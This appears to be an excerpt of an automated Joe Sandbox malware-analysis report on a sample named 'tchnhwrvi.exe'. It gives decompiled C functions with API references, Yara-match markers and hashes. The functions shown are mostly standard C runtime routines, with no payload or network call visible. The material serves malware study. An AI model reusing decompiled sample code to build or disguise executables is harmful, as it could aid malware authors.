                      • Part of subcall function 0040B74F: CloseHandle.KERNEL32(FFFFFFFE,0040B799,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008,00000008), ref: 0040B75F
                    • ___initconout.LIBCMT ref: 0040B799
                      • Part of subcall function 0040B711: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0040B740,0040AF0D,00000008,?,0040A37F,00000008,00000000,00000000,00000008), ref: 0040B724
                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008), ref: 0040B7AE
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: 0cf35d0622a046613081d4d5705aad4e630b2f1f256b3374397953c6fad5f189
                    • Instruction ID: 9be2d2e95ebdf4ca364c863a04f8f34c4778b8d92ece9612039581527531bafd
                    • Opcode Fuzzy Hash: 0cf35d0622a046613081d4d5705aad4e630b2f1f256b3374397953c6fad5f189
                    • Instruction Fuzzy Hash: 72F01236400124BBCF162F96DC049CA3F65EB883B1B008435FA18A6161C7318870DBD8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E00404751(void* __edx, intOrPtr _a4) {
                    				signed int _v8;
                    				void* _v12;
                    				char _v16;
                    				void* __ebx;
                    				void* __edi;
                    				intOrPtr* _t33;
                    				intOrPtr _t36;
                    				intOrPtr* _t41;
                    				intOrPtr* _t42;
                    				WCHAR* _t47;
                    				intOrPtr _t52;
                    				void* _t55;
                    				intOrPtr* _t56;
                    				intOrPtr _t57;
                    				intOrPtr _t58;
                    				intOrPtr _t61;
                    				intOrPtr _t64;
                    
                    				_t55 = __edx;
                    				_t57 = _a4;
                    				if(_t57 != 0) {
                    					if(_t57 == 2 || _t57 == 1) {
                    						GetModuleFileNameW(0, 0x415d20, 0x104);
                    						 *0x415f88 = 0x415d20;
                    						_t47 =  *0x415f9c; // 0x1551c54
                    						if(_t47 == 0 ||  *_t47 == 0) {
                    							_t47 = 0x415d20;
                    						}
                    						_v8 = 0;
                    						_v16 = 0;
                    						_t61 = E00404A28(E00404887(_t47, 0, 0,  &_v8,  &_v16), _v8, _v16, 2);
                    						if(_t61 != 0) {
                    							E00404887(_t47, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
                    							if(_t57 != 1) {
                    								_push( &_v12);
                    								_v12 = 0;
                    								_t58 = E00406A91(0, _t55, _t57, _t61);
                    								if(_t58 == 0) {
                    									_t56 = _v12;
                    									_t52 = 0;
                    									_t33 = _t56;
                    									if( *_t56 == 0) {
                    										L17:
                    										 *0x415f8c = _t52;
                    										_v12 = 0;
                    										 *0x415f94 = _t56;
                    										E0040650B(0);
                    										_t58 = 0;
                    										L18:
                    										_v12 = 0;
                    										E0040650B(_t61);
                    										_t36 = _t58;
                    										goto L19;
                    									} else {
                    										goto L16;
                    									}
                    									do {
                    										L16:
                    										_t33 = _t33 + 4;
                    										_t52 = _t52 + 1;
                    									} while ( *_t33 != 0);
                    									goto L17;
                    								}
                    								E0040650B(_v12);
                    								goto L18;
                    							}
                    							 *0x415f94 = _t61;
                    							 *0x415f8c = _v8 - 1;
                    							goto L12;
                    						} else {
                    							_t41 = E0040649B();
                    							_push(0xc);
                    							_pop(0);
                    							 *_t41 = 0;
                    							L12:
                    							E0040650B(0);
                    							_t36 = 0;
                    							L19:
                    							goto L20;
                    						}
                    					} else {
                    						_t42 = E0040649B();
                    						_t64 = 0x16;
                    						 *_t42 = _t64;
                    						E004062A0();
                    						_t36 = _t64;
                    						L20:
                    						return _t36;
                    					}
                    				}
                    				return 0;
                    			}





















                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ]A$C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe
                    • API String ID: 0-3974353124
                    • Opcode ID: 4b1e80dd0c630a597ae57bd7ace0b530a474018883af56ddac1066d4e5a9de18
                    • Instruction ID: 516f48771e3ea8525e46061b4c90816104fcc3183a12e04dc85d04e75a492b31
                    • Opcode Fuzzy Hash: 4b1e80dd0c630a597ae57bd7ace0b530a474018883af56ddac1066d4e5a9de18
                    • Instruction Fuzzy Hash: 0731D6B6A00214BFD711EF95DC819DFBBACEB85354B11847FF605B7281D6388D018B98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 65%
                    			E00403C90(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                    				signed int _v8;
                    				signed int _v12;
                    				intOrPtr* _v16;
                    				signed int _v20;
                    				char _v24;
                    				intOrPtr _v28;
                    				signed int _v36;
                    				void* _v40;
                    				intOrPtr _v44;
                    				signed int _v48;
                    				intOrPtr _v56;
                    				void _v60;
                    				signed char* _v68;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t74;
                    				void* _t75;
                    				char _t76;
                    				signed char _t78;
                    				signed int _t80;
                    				signed char* _t81;
                    				signed int _t82;
                    				signed int _t83;
                    				intOrPtr* _t87;
                    				void* _t90;
                    				signed char* _t93;
                    				intOrPtr* _t96;
                    				signed char _t97;
                    				intOrPtr _t98;
                    				intOrPtr _t99;
                    				intOrPtr* _t101;
                    				signed int _t102;
                    				signed int _t103;
                    				signed char _t108;
                    				signed char* _t111;
                    				signed int _t112;
                    				signed char* _t116;
                    				void* _t121;
                    				signed int _t123;
                    				void* _t130;
                    				void* _t131;
                    
                    				_t110 = __edx;
                    				_t100 = __ecx;
                    				_t96 = _a4;
                    				if( *_t96 == 0x80000003) {
                    					return _t74;
                    				} else {
                    					_push(_t121);
                    					_t75 = E004029B3(_t96, __ecx, __edx, _t121);
                    					if( *((intOrPtr*)(_t75 + 8)) != 0) {
                    						__imp__EncodePointer(0);
                    						_t121 = _t75;
                    						if( *((intOrPtr*)(E004029B3(_t96, __ecx, __edx, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
                    							_t87 = E00402E31(__edx, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
                    							_t130 = _t130 + 0x1c;
                    							if(_t87 != 0) {
                    								L16:
                    								return _t87;
                    							}
                    						}
                    					}
                    					_t76 = _a20;
                    					_v24 = _t76;
                    					_v20 = 0;
                    					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
                    						_push(_a28);
                    						E00402D64(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
                    						_t112 = _v36;
                    						_t131 = _t130 + 0x18;
                    						_t87 = _v40;
                    						_v16 = _t87;
                    						_v8 = _t112;
                    						if(_t112 < _v28) {
                    							_t102 = _t112 * 0x14;
                    							_v12 = _t102;
                    							do {
                    								_t103 = 5;
                    								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
                    								_t131 = _t131 + 0xc;
                    								if(_v60 <= _t90 && _t90 <= _v56) {
                    									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
                    									_t108 = _t93[4];
                    									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
                    										if(( *_t93 & 0x00000040) == 0) {
                    											_push(0);
                    											_push(1);
                    											E0040386B(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
                    											_t112 = _v8;
                    											_t131 = _t131 + 0x30;
                    										}
                    									}
                    								}
                    								_t112 = _t112 + 1;
                    								_t87 = _v16;
                    								_t102 = _v12 + 0x14;
                    								_v8 = _t112;
                    								_v12 = _t102;
                    							} while (_t112 < _v28);
                    						}
                    						goto L16;
                    					}
                    					E0040579A(_t96, _t100, _t110, _t121);
                    					asm("int3");
                    					_t111 = _v68;
                    					_push(_t96);
                    					_push(_t121);
                    					_push(0);
                    					_t78 = _t111[4];
                    					if(_t78 == 0) {
                    						L41:
                    						_t80 = 1;
                    					} else {
                    						_t101 = _t78 + 8;
                    						if( *_t101 == 0) {
                    							goto L41;
                    						} else {
                    							_t116 = _a4;
                    							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
                    								_t97 = _t116[4];
                    								_t123 = 0;
                    								if(_t78 == _t97) {
                    									L33:
                    									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
                    										_t81 = _a8;
                    										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
                    											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
                    												_t123 = 1;
                    											}
                    										}
                    									}
                    									_t80 = _t123;
                    								} else {
                    									_t59 = _t97 + 8; // 0x6e
                    									_t82 = _t59;
                    									while(1) {
                    										_t98 =  *_t101;
                    										if(_t98 !=  *_t82) {
                    											break;
                    										}
                    										if(_t98 == 0) {
                    											L29:
                    											_t83 = _t123;
                    										} else {
                    											_t99 =  *((intOrPtr*)(_t101 + 1));
                    											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
                    												break;
                    											} else {
                    												_t101 = _t101 + 2;
                    												_t82 = _t82 + 2;
                    												if(_t99 != 0) {
                    													continue;
                    												} else {
                    													goto L29;
                    												}
                    											}
                    										}
                    										L31:
                    										if(_t83 == 0) {
                    											goto L33;
                    										} else {
                    											_t80 = 0;
                    										}
                    										goto L42;
                    									}
                    									asm("sbb eax, eax");
                    									_t83 = _t82 | 0x00000001;
                    									goto L31;
                    								}
                    							} else {
                    								goto L41;
                    							}
                    						}
                    					}
                    					L42:
                    					return _t80;
                    				}
                    			}














































                    APIs
                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00403CB5
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: EncodePointer
                    • String ID: MOC$RCC
                    • API String ID: 2118026453-2084237596
                    • Opcode ID: eca3ff77fe2c4482fc0436b7e2b81c3f6b64dd45eb89c22104b1787426b2fa34
                    • Instruction ID: 27d9d21774ce73f4523aea127e5a37313707127f13db8d93af602d3374e0ea50
                    • Opcode Fuzzy Hash: eca3ff77fe2c4482fc0436b7e2b81c3f6b64dd45eb89c22104b1787426b2fa34
                    • Instruction Fuzzy Hash: E9415B72900109EFCF16DF94CE81AEEBBB9BF48305F1840AAF905B7291D3399A50DB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00283581() {
                    				intOrPtr _t5;
                    				intOrPtr _t6;
                    				intOrPtr _t10;
                    				void* _t12;
                    				intOrPtr _t15;
                    				intOrPtr* _t16;
                    				signed int _t19;
                    				signed int _t20;
                    				intOrPtr _t26;
                    				intOrPtr _t27;
                    
                    				_t5 =  *0x2970c0;
                    				_t26 = 0x14;
                    				if(_t5 != 0) {
                    					if(_t5 < _t26) {
                    						_t5 = _t26;
                    						goto L4;
                    					}
                    				} else {
                    					_t5 = 0x200;
                    					L4:
                    					 *0x2970c0 = _t5;
                    				}
                    				_t6 = E00286CCA(_t5, 4);
                    				 *0x2960a4 = _t6;
                    				if(_t6 != 0) {
                    					L8:
                    					_t19 = 0;
                    					_t15 = 0x294008;
                    					while(1) {
                    						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                    						_t15 = _t15 + 0x20;
                    						_t19 = _t19 + 4;
                    						if(_t15 >= 0x294288) {
                    							break;
                    						}
                    						_t6 =  *0x2960a4;
                    					}
                    					_t27 = 0xfffffffe;
                    					_t20 = 0;
                    					_t16 = 0x294018;
                    					do {
                    						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x295fa0 + (_t20 >> 5) * 4))));
                    						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                    							 *_t16 = _t27;
                    						}
                    						_t16 = _t16 + 0x20;
                    						_t20 = _t20 + 1;
                    					} while (_t16 < 0x294078);
                    					return 0;
                    				} else {
                    					 *0x2970c0 = _t26;
                    					_t6 = E00286CCA(_t26, 4);
                    					 *0x2960a4 = _t6;
                    					if(_t6 != 0) {
                    						goto L8;
                    					} else {
                    						_t12 = 0x1a;
                    						return _t12;
                    					}
                    				}
                    			}














                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __calloc_crt
                    • String ID: x@)
                    • API String ID: 3494438863-392705939
                    • Opcode ID: 42214b720b95a94bc751b0f4699651fd09d9b602309f1313767f496c1e86e7fc
                    • Instruction ID: 7b1f0429bc20b716885479a35626b49f6d04e1c7125b07e020435093c934b459
                    • Opcode Fuzzy Hash: 42214b720b95a94bc751b0f4699651fd09d9b602309f1313767f496c1e86e7fc
                    • Instruction Fuzzy Hash: 9311EC367375115BEB18EF1DBC8D6652385FB48B24758012BF605CB3D0EB34DA614740
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E004018D4(void* __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                    				intOrPtr _v0;
                    				void* _v808;
                    				int _t10;
                    				intOrPtr _t15;
                    				signed int _t16;
                    				signed int _t18;
                    				signed int _t20;
                    				intOrPtr _t23;
                    				intOrPtr _t24;
                    				intOrPtr _t25;
                    				intOrPtr _t26;
                    				intOrPtr _t27;
                    				intOrPtr _t28;
                    				intOrPtr _t29;
                    				intOrPtr* _t31;
                    				intOrPtr* _t33;
                    				void* _t36;
                    
                    				_t29 = __esi;
                    				_t28 = __edi;
                    				_t27 = __edx;
                    				_t24 = __ecx;
                    				_t23 = __ebx;
                    				_t36 = _t24 -  *0x415010; // 0xb51c3102
                    				if(_t36 != 0) {
                    					_t31 = _t33;
                    					_t10 = IsProcessorFeaturePresent(0x17);
                    					if(_t10 != 0) {
                    						_t24 = 2;
                    						asm("int 0x29");
                    					}
                    					 *0x415a48 = _t10;
                    					 *0x415a44 = _t24;
                    					 *0x415a40 = _t27;
                    					 *0x415a3c = _t23;
                    					 *0x415a38 = _t29;
                    					 *0x415a34 = _t28;
                    					 *0x415a60 = ss;
                    					 *0x415a54 = cs;
                    					 *0x415a30 = ds;
                    					 *0x415a2c = es;
                    					 *0x415a28 = fs;
                    					 *0x415a24 = gs;
                    					asm("pushfd");
                    					_pop( *0x415a58);
                    					 *0x415a4c =  *_t31;
                    					 *0x415a50 = _v0;
                    					 *0x415a5c =  &_a4;
                    					 *0x415998 = 0x10001;
                    					_t15 =  *0x415a50; // 0x0
                    					 *0x415954 = _t15;
                    					 *0x415948 = 0xc0000409;
                    					 *0x41594c = 1;
                    					 *0x415958 = 1;
                    					_t16 = 4;
                    					 *((intOrPtr*)(0x41595c + _t16 * 0)) = 2;
                    					_t18 = 4;
                    					_t25 =  *0x415010; // 0xb51c3102
                    					 *((intOrPtr*)(_t31 + _t18 * 0 - 8)) = _t25;
                    					_t20 = 4;
                    					_t26 =  *0x415014; // 0x4ae3cefd
                    					 *((intOrPtr*)(_t31 + (_t20 << 0) - 8)) = _t26;
                    					return E00401F2A("HYA");
                    				} else {
                    					return __eax;
                    				}
                    			}





















                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401F5D
                    • ___raise_securityfailure.LIBCMT ref: 00402045
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor___raise_securityfailure
                    • String ID: HYA
                    • API String ID: 3761405300-3949630065
                    • Opcode ID: 2add615a2287014fb40954335aba8a78c14fe77b94684ac88e063d6ce4629430
                    • Instruction ID: 6cb4d069ac1d3707beaa45bb2dd9a615a7934397750866ae2a5b0aac751b91a7
                    • Opcode Fuzzy Hash: 2add615a2287014fb40954335aba8a78c14fe77b94684ac88e063d6ce4629430
                    • Instruction Fuzzy Hash: 662103B56A1A01DBD310DF55F9D6AC43BA0BF88394F50D23AE5098ABB0D3B45880CF4E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • DecodePointer.KERNEL32(?,00283CB2,00000000,00000000,00000000,00000000,00000000,0028A4F8,?,00286212,00000003,0028A51B,00000001,00000000,00000000), ref: 00283C84
                    • __invoke_watson.LIBCMT ref: 00283CA0
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: DecodePointer__invoke_watson
                    • String ID: .(
                    • API String ID: 4034010525-3375098775
                    • Opcode ID: 71ff6abe595ca3f92193aa33450ca7d47877ce67ba9e60f544bbc1de77c1a542
                    • Instruction ID: 3973f6b7878f0546d7fa801e38685c4ef15b4c8840f3f5cf40c168273c45d7e8
                    • Opcode Fuzzy Hash: 71ff6abe595ca3f92193aa33450ca7d47877ce67ba9e60f544bbc1de77c1a542
                    • Instruction Fuzzy Hash: 00E0EC3651010DBBCF426F65DC0A96A3F66FB44750B454821FD1491071D633C931EB90
                    Uniqueness

                    Uniqueness Score: -1.00%